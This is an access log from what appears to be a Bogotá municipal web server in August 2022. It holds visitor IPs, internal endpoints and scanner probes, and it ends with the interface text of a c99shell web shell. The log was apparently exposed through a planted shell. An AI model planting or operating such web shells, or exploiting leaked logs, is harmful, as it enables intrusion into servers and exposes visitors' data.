186.84.90.91 - - [03/Aug/2022:23:09:43 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX19Wd50gb0e3ae3qx675UFBMbYrQANAUktU=&y=U2FsdGVkX19tMAUEv2ODBqLM7ZST2b8dJnPwq4804YsnyRWJlQFzMhAopnmDegjC HTTP/1.1" 200 25
186.84.90.91 - - [03/Aug/2022:23:09:43 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18vqrz2VTWIzRnCQnlIQgPtjGdiSBFPhG78pHd7Ya9Ytr2povyPsA7tuBqOruB1jQYSlC4JpBXNUcaUbxr5B77Wf2gT/L6QwJ114bPo8+d1UlBe62TSp09WTk64CYIj/A07jJZWYNIAvnTu/VWTL1NCBspKlmQO3tI=&u=U2FsdGVkX19Wd50gb0e3ae3qx675UFBMbYrQANAUktU=&y=U2FsdGVkX19tMAUEv2ODBqLM7ZST2b8dJnPwq4804YsnyRWJlQFzMhAopnmDegjC HTTP/1.1" 200 25
186.84.90.91 - - [03/Aug/2022:23:09:43 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19uwf6L9Bm7xLUelHR7leb6jsqHqh4NIESTPRTm16Z5KNTR/dOTg+Qu3s1opPEKYKj+C9Z9AvyFWlQATIgHwfdwFyeNDQwJ+Z+/0tm9LzQ0SH6MBM6/HOvEvlNgW3YIoXegiTY9q6CdCCNsaJxBVHJlq04c2ED0gng=&u=U2FsdGVkX19Wd50gb0e3ae3qx675UFBMbYrQANAUktU=&y=U2FsdGVkX19tMAUEv2ODBqLM7ZST2b8dJnPwq4804YsnyRWJlQFzMhAopnmDegjC HTTP/1.1" 200 25
186.84.90.91 - - [03/Aug/2022:23:09:43 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+Kddua4+kjal4qXO72MtEmnWrvr0uvYzEds6/7D3+rhTCH7Kgujzc4YelnN+PlhzZiFH14HRUwxIlXtUKyirR3sJjtPOm6tYqdmW68XXJmtdlyLnSrW4DTZWRDJQfFNV7cp20UPJn6me0Ql+6U1STGXFTt6EPCHVg=&u=U2FsdGVkX19Wd50gb0e3ae3qx675UFBMbYrQANAUktU=&y=U2FsdGVkX19tMAUEv2ODBqLM7ZST2b8dJnPwq4804YsnyRWJlQFzMhAopnmDegjC HTTP/1.1" 200 25
186.84.90.91 - - [03/Aug/2022:23:09:44 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+THPaFEEzELMF1J4wl6VY0m9hRW4WVA6fyyNIhLRq6r/GDyv1jtAF89EKQrldK424HfCelVUDUz/ZaA8707sEruvxM1GtG1KkzkxIa70Vc3irzfLtqiURjHs4+Wl7JdJbdE6xwwhVeGEmgurCjsOv9+XVqUIGSA6OU3+iieHvSX9vpnYEsLUG4&u=U2FsdGVkX19Wd50gb0e3ae3qx675UFBMbYrQANAUktU=&y=U2FsdGVkX19tMAUEv2ODBqLM7ZST2b8dJnPwq4804YsnyRWJlQFzMhAopnmDegjC HTTP/1.1" 200 25
186.84.90.91 - - [03/Aug/2022:23:09:44 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18C/X1HN/6YjrCjsaYXA39YLAQHGJPMTEIjp2TShsAOUZs52e+1ttlvLIIryZHVjaQ5YxUs/dUF9tHuuDoW7T+as92qX87TvqQ6n5G4DDmond3IFNr75XFo1WxzrHCehBFYZfbYTYgLeZ/uhyi+FTX3mbEcKBhA5QhAu9yvpnDAlc8mQSD1Zjp8SsBIQudu5HHA4+A/Qfpc6OdW9K15Ga/JAG2nutsyZE+QZuzrjVSgbuONGZ02dAzXMcVVKTuOESqlxGuJ3LeM69SPGib9LYagRpgLU9tRktXnGFyXRmfDyta4M/fSz5CZM6qSTNgP53iubNr5MYRSY6VrHq0KoOu44N97Vto2b4poDgqp/pD8gIZZWcy1p9pGr2OkckSU7lGuPIQxMXQK4UWAFDG0H5h78vf3tZnde9Hvtuy7uRySRzhSIw7qbtFSEADfPSQCWrm0Qzbvc+XdB/m22uBhk91THZwvv6cqkrzbxBl9mPiafsz0ngTYYhbaC65MoxCzj0niqhqFw+VIHdS8J+pflhS2E7OgoZjUromsk3cDztFXaUilEiLZMaCv&u=U2FsdGVkX19Wd50gb0e3ae3qx675UFBMbYrQANAUktU=&y=U2FsdGVkX19tMAUEv2ODBqLM7ZST2b8dJnPwq4804YsnyRWJlQFzMhAopnmDegjC HTTP/1.1" 200 25
186.84.90.91 - - [03/Aug/2022:23:09:44 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18pdtx8qplXZ0Og44wZTKbJ5dsphsH2TF7kNn0txutf2B8NqnOHxpJdaU4mL9+kXzIGTjdvBMvORz8q2nzbUG0xJtBk/CEl2Vrg2J3k2MMICL2ZGCRgyxVsHB2woaZM6mXMLSbWE4lDDS7evGoxGHICdrE8N++cJVDBpebM1hR/6MzVs0X3BjKw3O+O48jf7b3ZYTuaEIS5Un8X+Ks5eer3xocvrSqgBDDYMmoZCSrcnpqgxpA8DwD55LE7Ccj15+26PKiwXx3wfYPhCPPtZzwZNBflgcVRq6wu5/SdixnumpfEUuvjRPXffviK77IhkzjXQycFNi4GSoMoaW0NQxMta+unc/tWeZZ0rWZdMKGu5yYUkAs3sgxjugz+RJVEkpJqOIiEhqqA9ZmZarG7gjbqLi/i6ubh1umYPha2z5DDX1UCQ4k+/65Mm3knz6PGKGdoyyeB6hVVYEamFxhYYoag+f7mtOvf5UkK2zhbgvdXJcOA2b4UleGKVcU2AFD7sRjiy1vqNpXHa/gJlHfikW2/jV7oRacGGCc=&u=U2FsdGVkX19Wd50gb0e3ae3qx675UFBMbYrQANAUktU=&y=U2FsdGVkX19tMAUEv2ODBqLM7ZST2b8dJnPwq4804YsnyRWJlQFzMhAopnmDegjC HTTP/1.1" 200 25
186.28.87.99 - - [03/Aug/2022:23:10:18 -0500] "POST /appsia/controlador HTTP/1.1" 200 7779
216.245.221.92 - - [03/Aug/2022:23:10:21 -0500] "HEAD / HTTP/1.1" 200 -
186.28.87.99 - - [03/Aug/2022:23:10:27 -0500] "POST /appsia/controlador HTTP/1.1" 200 6644
186.28.87.99 - - [03/Aug/2022:23:10:28 -0500] "POST /appsia/controlador HTTP/1.1" 200 11374
2.57.122.98 - - [03/Aug/2022:23:12:02 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [03/Aug/2022:23:10:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Aug/2022:23:11:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [03/Aug/2022:23:13:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
173.252.107.8 - - [03/Aug/2022:23:13:15 -0500] "GET /alcaldesa-claudia-lopez-encabezo-encuentro-con-las-mujeres-que-reverdecen-a-bogota.html HTTP/1.1" 206 1069
173.252.107.13 - - [03/Aug/2022:23:14:02 -0500] "GET /no-se-deje-enganar-mujeres-que-reverdecen-no-solicita-informacion-por-cadenas-de-whatsapp.html HTTP/1.1" 206 1026
173.252.107.118 - - [03/Aug/2022:23:14:03 -0500] "GET /images/pieza-mujeres-reverdecen-falso.jpg HTTP/1.1" 200 132707
173.252.87.3 - - [03/Aug/2022:23:14:03 -0500] "GET /images/pieza-mujeres-reverdecen-falso.jpg HTTP/1.1" 200 132707
216.245.221.92 - - [03/Aug/2022:23:15:21 -0500] "HEAD / HTTP/1.1" 200 -
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/br1c1.gif HTTP/1.1" 200 172
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/Turnbo1.gif HTTP/1.1" 200 227
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/aceptar1.gif HTTP/1.1" 200 604
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/br1c3.gif HTTP/1.1" 200 302
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/limpiar1.gif HTTP/1.1" 200 606
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/br3c3.gif HTTP/1.1" 200 186
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/br3c1.gif HTTP/1.1" 200 177
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/br1c2.gif HTTP/1.1" 200 297
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/br3c2.gif HTTP/1.1" 200 285
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/br2c1.gif HTTP/1.1" 200 297
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/br2c2.gif HTTP/1.1" 200 302
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/br2c3.gif HTTP/1.1" 200 416
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /catalogoisis/imagenes/Header.gif HTTP/1.1" 200 30313
186.28.79.145 - - [03/Aug/2022:23:15:53 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
3.71.134.148 - - [03/Aug/2022:23:16:03 -0500] "GET / HTTP/1.1" 200 319
186.28.87.99 - - [03/Aug/2022:23:17:01 -0500] "POST /appsia/controlador HTTP/1.1" 200 7779
186.28.87.99 - - [03/Aug/2022:23:17:06 -0500] "POST /appsia/controlador HTTP/1.1" 200 6644
186.28.87.99 - - [03/Aug/2022:23:17:08 -0500] "POST /appsia/controlador HTTP/1.1" 200 11007
172.22.2.4 - - [03/Aug/2022:23:16:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Aug/2022:23:18:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
172.22.2.4 - - [03/Aug/2022:23:18:47 -0500] "GET /BLA/boletinlegal/Directivas/2014/Directiva%20No.%201%20del%2010%20de%20Abril%20de%202014.pdf HTTP/1.1" 200 258865
172.22.2.4 - - [03/Aug/2022:23:17:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
201.245.192.253 - - [03/Aug/2022:23:20:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47947
216.245.221.92 - - [03/Aug/2022:23:20:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Aug/2022:23:20:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47956
157.55.39.84 - - [03/Aug/2022:23:21:20 -0500] "GET /BLA/resoluciones/AUTOS%202018/0721.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Aug/2022:23:23:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
172.22.2.4 - - [03/Aug/2022:23:22:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Aug/2022:23:23:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56005
216.245.221.92 - - [03/Aug/2022:23:25:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Aug/2022:23:28:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
172.22.2.4 - - [03/Aug/2022:23:28:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Aug/2022:23:30:17 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47947
216.245.221.92 - - [03/Aug/2022:23:30:21 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Aug/2022:23:30:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47956
172.22.2.4 - - [03/Aug/2022:23:28:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
201.245.192.253 - - [03/Aug/2022:23:33:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
157.55.39.98 - - [03/Aug/2022:23:33:31 -0500] "GET /BLA/resoluciones/AUTOS%202022/0987.pdf HTTP/1.1" 304 -
66.249.70.17 - - [03/Aug/2022:23:33:55 -0500] "-" 408 -
216.245.221.92 - - [03/Aug/2022:23:35:21 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Aug/2022:23:33:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Aug/2022:23:36:25 -0500] "GET /BLA/boletinlegal/system_api.php HTTP/1.1" 404 1018
172.22.2.4 - - [03/Aug/2022:23:34:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60272
172.22.2.4 - - [03/Aug/2022:23:36:26 -0500] "GET /BLA/boletinlegal/c/version.js HTTP/1.1" 404 1018
172.22.2.4 - - [03/Aug/2022:23:36:28 -0500] "GET /BLA/boletinlegal/streaming/clients_live.php HTTP/1.1" 404 1018
172.22.2.4 - - [03/Aug/2022:23:36:30 -0500] "GET /BLA/boletinlegal/stalker_portal/c/version.js HTTP/1.1" 404 1018
172.22.2.4 - - [03/Aug/2022:23:36:32 -0500] "GET /BLA/boletinlegal/stream/live.php HTTP/1.1" 404 1018
172.22.2.4 - - [03/Aug/2022:23:36:33 -0500] "GET /BLA/boletinlegal/flu/403.html HTTP/1.1" 404 1018
172.22.2.4 - - [03/Aug/2022:23:36:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [03/Aug/2022:23:38:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
190.253.152.240 - - [03/Aug/2022:23:39:47 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 271588
207.46.13.20 - - [03/Aug/2022:23:40:12 -0500] "GET / HTTP/1.1" 200 319
190.253.152.240 - - [03/Aug/2022:23:40:14 -0500] "GET /BLA/resoluciones/AUTOS%202012/0111.pdf HTTP/1.1" 200 811490
201.245.192.253 - - [03/Aug/2022:23:40:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47947
216.245.221.92 - - [03/Aug/2022:23:40:21 -0500] "HEAD / HTTP/1.1" 200 -
190.253.152.240 - - [03/Aug/2022:23:40:21 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 271588
201.245.192.253 - - [03/Aug/2022:23:40:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47956
190.253.152.240 - - [03/Aug/2022:23:40:57 -0500] "GET /BLA/resoluciones/AUTOS%202012/0016.pdf HTTP/1.1" 200 250394
178.62.109.10 - - [03/Aug/2022:23:41:11 -0500] "HEAD / HTTP/1.0" 200 -
178.62.109.10 - - [03/Aug/2022:23:41:13 -0500] "GET /system_api.php HTTP/1.1" 404 1018
178.62.109.10 - - [03/Aug/2022:23:41:15 -0500] "GET /c/version.js HTTP/1.1" 404 1018
178.62.109.10 - - [03/Aug/2022:23:41:18 -0500] "GET /streaming/clients_live.php HTTP/1.1" 404 1018
178.62.109.10 - - [03/Aug/2022:23:41:20 -0500] "GET /stalker_portal/c/version.js HTTP/1.1" 404 1018
178.62.109.10 - - [03/Aug/2022:23:41:22 -0500] "GET /stream/live.php HTTP/1.1" 404 1018
178.62.109.10 - - [03/Aug/2022:23:41:24 -0500] "GET /flu/403.html HTTP/1.1" 404 1018
172.22.2.4 - - [03/Aug/2022:23:39:45 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
178.62.109.10 - - [03/Aug/2022:23:41:26 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [03/Aug/2022:23:40:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59310
201.245.192.253 - - [03/Aug/2022:23:43:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
216.245.221.92 - - [03/Aug/2022:23:45:21 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Aug/2022:23:45:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
89.100.107.74 - - [03/Aug/2022:23:47:56 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [03/Aug/2022:23:46:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58154
201.245.192.253 - - [03/Aug/2022:23:48:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
216.245.221.92 - - [03/Aug/2022:23:50:21 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Aug/2022:23:51:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Aug/2022:23:53:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
172.22.2.4 - - [03/Aug/2022:23:52:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53631
216.245.221.92 - - [03/Aug/2022:23:55:20 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Aug/2022:23:55:44 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2029%20de%20Julio%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Aug/2022:23:56:12 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%202%20del%2017%20de%20Mayo%20de%202011.pdf HTTP/1.1" 200 495382
201.245.192.253 - - [03/Aug/2022:23:58:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 44251
172.22.2.4 - - [03/Aug/2022:23:57:15 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Aug/2022:23:58:19 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [03/Aug/2022:23:58:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55621

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 1.8564 ]--